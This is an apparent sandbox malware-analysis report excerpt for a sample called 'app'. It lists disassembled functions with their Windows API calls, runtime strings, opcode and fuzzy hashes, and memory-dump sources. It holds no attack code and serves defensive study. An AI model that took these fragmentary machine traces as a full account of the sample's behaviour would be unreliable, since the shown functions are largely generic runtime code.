                                                                                                                                              • Instruction ID: 81078ee3ce04f899a7a6ce9267cfb065c325f8bad144afdf8676d079718d4fdb
                                                                                                                                              • Opcode Fuzzy Hash: edf37570b9a6133125698eafa9279b85b7ab7cef9f5632037470c00f62594779
                                                                                                                                              • Instruction Fuzzy Hash: 33B19C71A00229EBCF21CF95EC81AEF7BF5EF45314FA4012BF810A6262D7799851CB59
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D76F Relevance: 13.7, APIs: 9, Instructions: 179memorystringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClearVariant$AllocStringlstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3271446295-0
                                                                                                                                              • Opcode ID: 6282ef1ab9a2c62f5340b2b8bd7b05e750a85b2b0af811c20b1538a789a0357b
                                                                                                                                              • Instruction ID: cdccc334731853226970ff56d724ea0fd08195d0ec7bcfd3a5b41d5743917be6
                                                                                                                                              • Opcode Fuzzy Hash: 6282ef1ab9a2c62f5340b2b8bd7b05e750a85b2b0af811c20b1538a789a0357b
                                                                                                                                              • Instruction Fuzzy Hash: 90617E71E00219EFCF10EFA4DC85AEEBBB5BF04300F94452AF555A7250D7789985CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00422DEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetSystemMetrics.USER32(0000002A), ref: 00422EB8
                                                                                                                                              • GlobalLock.KERNEL32(00000000,?,?,?,?), ref: 00422F23
                                                                                                                                              • CreateDialogIndirectParamA.USER32(?,?,?,Function_0002288B,00000000), ref: 00422F52
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDialogGlobalIndirectLockMetricsParamSystem
                                                                                                                                              • String ID: MS Shell Dlg
                                                                                                                                              • API String ID: 3758755205-76309092
                                                                                                                                              • Opcode ID: 152948b375090ba3bf973604bc07184c04cab0d5ef470bd3cd5d12d947ef66b1
                                                                                                                                              • Instruction ID: ca2fc6de147dc94a796e69e52f3573e941c4428df88ff4a11067891bc5981fc6
                                                                                                                                              • Opcode Fuzzy Hash: 152948b375090ba3bf973604bc07184c04cab0d5ef470bd3cd5d12d947ef66b1
                                                                                                                                              • Instruction Fuzzy Hash: CE51F131B00225EFCB11EF64EA459EEBBB0EF44314F95066AF801E7251D7B88940DB99
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041A758 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 116fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0041A7D1
                                                                                                                                              • GetStdHandle.KERNEL32(000000F4,0043A928,00000000,?,00000000,00000000,00000000,00000000), ref: 0041A8AC
                                                                                                                                              • WriteFile.KERNEL32(00000000), ref: 0041A8B3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$HandleModuleNameWrite
                                                                                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                              • API String ID: 3784150691-4022980321
                                                                                                                                              • Opcode ID: 5eb8b9adc66271577908d0f2b30b26b3f93ca16067fc2b3402f50ca97e530117
                                                                                                                                              • Instruction ID: 873bd3f0479595d816e6d3d2c3c66433944047767b5fc083997a35eeea225ff6
                                                                                                                                              • Opcode Fuzzy Hash: 5eb8b9adc66271577908d0f2b30b26b3f93ca16067fc2b3402f50ca97e530117
                                                                                                                                              • Instruction Fuzzy Hash: 51314572540204ABD720EB70CC82FEA33B89F4A314F11492BF566E2182DA3CE9D1CA5D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041C8D8 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 98COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,0043B1D8,00000118,004177DE,00000001,00000000,0043A508,00000008,0041A8CA,00000000,00000000,00000000), ref: 0041C956
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileModuleName
                                                                                                                                              • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                                                                                              • API String ID: 514040917-1673886896
                                                                                                                                              • Opcode ID: afbd14b618276193030e3c0af5201b55a9026821446303c7d5f8591930f4bbdf
                                                                                                                                              • Instruction ID: f9b76a29898f58c7373b8753ea105286733a2ff1b2e8d5243023788ac5f4ec33
                                                                                                                                              • Opcode Fuzzy Hash: afbd14b618276193030e3c0af5201b55a9026821446303c7d5f8591930f4bbdf
                                                                                                                                              • Instruction Fuzzy Hash: CA31B7719412186BCB11EB61CC82FDE37789F09368F11415FF118B6182DB7CDA918BAD
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042BE69 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 94stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0042BEA5
                                                                                                                                              • PathFindExtensionA.SHLWAPI(?), ref: 0042BEB2
                                                                                                                                                • Part of subcall function 0042BE3A: PathFindFileNameA.SHLWAPI(?,00427185,?,?,?), ref: 0042BE3E
                                                                                                                                                • Part of subcall function 0042BE3A: lstrlenA.KERNEL32(00000000), ref: 0042BE4C
                                                                                                                                              • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042BF3D
                                                                                                                                              • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042BF6A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindNamePath$ExtensionModulelstrcatlstrcpylstrlen
                                                                                                                                              • String ID: .CHM$.HLP$.INI
                                                                                                                                              • API String ID: 3409542269-4017452060
                                                                                                                                              • Opcode ID: 5208ab65a18fcb4c340f3c54e1a250997058e9b9430b917999dc72298521812a
                                                                                                                                              • Instruction ID: f23bd32b8940e093c85a1fee808d6a361bb9d4e487b19eb4f682e07407b9da65
                                                                                                                                              • Opcode Fuzzy Hash: 5208ab65a18fcb4c340f3c54e1a250997058e9b9430b917999dc72298521812a
                                                                                                                                              • Instruction Fuzzy Hash: 76314D71A447289FCB21DB65ED44ADAB7F8FB18304F9048ABE586D7240D7B8E980CF54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D5D5 Relevance: 12.2, APIs: 8, Instructions: 245stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1659193697-0
                                                                                                                                              • Opcode ID: ac1b358337dca50b234fc3dc3a64ea0e40d9c39c4fce7a5d9b49bc41b1c3f848
                                                                                                                                              • Instruction ID: 47f9f9a9bf0d79d52291fec9dc3460f5edb29a58d4097f6a8864e100f0027ea6
                                                                                                                                              • Opcode Fuzzy Hash: ac1b358337dca50b234fc3dc3a64ea0e40d9c39c4fce7a5d9b49bc41b1c3f848
                                                                                                                                              • Instruction Fuzzy Hash: 2191A371E00219DFDF20EFA4D844BEEBBB4FF04314F94452AE551A7290D7789946CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0258562F Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 174memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 025858DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02585969
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860D2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 02586105
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258632F
                                                                                                                                              Strings
                                                                                                                                              • nullfalsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,, xrefs: 0258563C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: nullfalsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,
                                                                                                                                              • API String ID: 1910495013-2124985433
                                                                                                                                              • Opcode ID: b470aa659ba974f0105161b82f241e6a33901545b2bc54a9d6d5dd911d09fdde
                                                                                                                                              • Instruction ID: d17bb74b1c6ac70ad2d3298534e2a877458adc55fe1d6128dab77f2d246d51d9
                                                                                                                                              • Opcode Fuzzy Hash: b470aa659ba974f0105161b82f241e6a33901545b2bc54a9d6d5dd911d09fdde
                                                                                                                                              • Instruction Fuzzy Hash: E081C230608741DFDB25DF20C484BEABBE2BF99304F04492DD9895B3A1DB716895CF46
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D740 Relevance: 12.2, APIs: 8, Instructions: 161memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SysAllocString.OLEAUT32 ref: 0042D74B
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0042D8B2
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0042D8D9
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0042D93D
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0042D952
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0042D967
                                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 0042D9A2
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0042D9B2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: StringVariant$ClearFree$AllocChangeType
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 984216764-0
                                                                                                                                              • Opcode ID: f945ae4cef94d89ca0ab2fcfcb01154a0f7e82251910b561d33c7f77115089c5
                                                                                                                                              • Instruction ID: 88606afa4f30e9e75de13378e47aca7ec09a9b99aa19c6302e81d3cbef9f0d5a
                                                                                                                                              • Opcode Fuzzy Hash: f945ae4cef94d89ca0ab2fcfcb01154a0f7e82251910b561d33c7f77115089c5
                                                                                                                                              • Instruction Fuzzy Hash: 89517E71E00319EFDF20EFA4E884AEEBBB9BF04300F90452AF555A7151D7789A45CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041ADAA Relevance: 12.1, APIs: 8, Instructions: 131COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(76170A60,00000000,?,?,?,?,00415EF3,?,0043A478,00000060), ref: 0041ADC6
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00415EF3,?,0043A478,00000060), ref: 0041ADDA
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(76170A60,00000000,?,?,?,?,00415EF3,?,0043A478,00000060), ref: 0041ADFC
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,76170A60,00000000,?,?,?,?,00415EF3), ref: 0041AE30
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00415EF3,?,0043A478,00000060), ref: 0041AE52
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00415EF3,?,0043A478,00000060), ref: 0041AE6B
                                                                                                                                              • GetEnvironmentStrings.KERNEL32(76170A60,00000000,?,?,?,?,00415EF3,?,0043A478,00000060), ref: 0041AE81
                                                                                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041AEBD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 883850110-0
                                                                                                                                              • Opcode ID: 5d9af8b0ec94a11fde1199224c6a39cf95f31cea720f82314cb6ac7f0f98ace0
                                                                                                                                              • Instruction ID: 7296914fd50a4553077de3f83afbd56d29e7c3b49a51b8de6ea79e60193acd72
                                                                                                                                              • Opcode Fuzzy Hash: 5d9af8b0ec94a11fde1199224c6a39cf95f31cea720f82314cb6ac7f0f98ace0
                                                                                                                                              • Instruction Fuzzy Hash: 60315772646318AFDB306F759C848BBB6ACEB55358B55083FF441C3301D7698CE682AB
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00421C7B Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GlobalLock.KERNEL32(?), ref: 00421C98
                                                                                                                                              • lstrcmpA.KERNEL32(?,?), ref: 00421CA4
                                                                                                                                              • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00421CB6
                                                                                                                                              • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00421CD6
                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00421CDE
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00421CE8
                                                                                                                                              • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00421CF5
                                                                                                                                              • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 00421D0D
                                                                                                                                                • Part of subcall function 00428D39: GlobalFlags.KERNEL32(?), ref: 00428D43
                                                                                                                                                • Part of subcall function 00428D39: GlobalUnlock.KERNEL32(?,00000000,?,00421D07,?,00000000,?,?,00000000,00000000,00000002), ref: 00428D54
                                                                                                                                                • Part of subcall function 00428D39: GlobalFree.KERNEL32(?), ref: 00428D5F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 168474834-0
                                                                                                                                              • Opcode ID: 7520906973776876a09beb12d5341ab987b3d81d92ef3fb3478fec3813e9e38f
                                                                                                                                              • Instruction ID: ec8fd795588025b9ef10f7e2b5649213c33d9538cf3f0e4b05607c2785a29bd5
                                                                                                                                              • Opcode Fuzzy Hash: 7520906973776876a09beb12d5341ab987b3d81d92ef3fb3478fec3813e9e38f
                                                                                                                                              • Instruction Fuzzy Hash: F3119176300114FEDB216F66EC45D6FBABCEB95744B90442EBA01D2221D639DD41EB38
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004109F8 Relevance: 10.8, APIs: 7, Instructions: 303memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040F320: CoGetClassObject.OLE32(?,?,00000000,0043B5B0,?), ref: 0040F340
                                                                                                                                              • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00410B86
                                                                                                                                              • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00410BA7
                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00410BFA
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00410C08
                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 00410C20
                                                                                                                                              • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 00410C43
                                                                                                                                              • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 00410C5F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
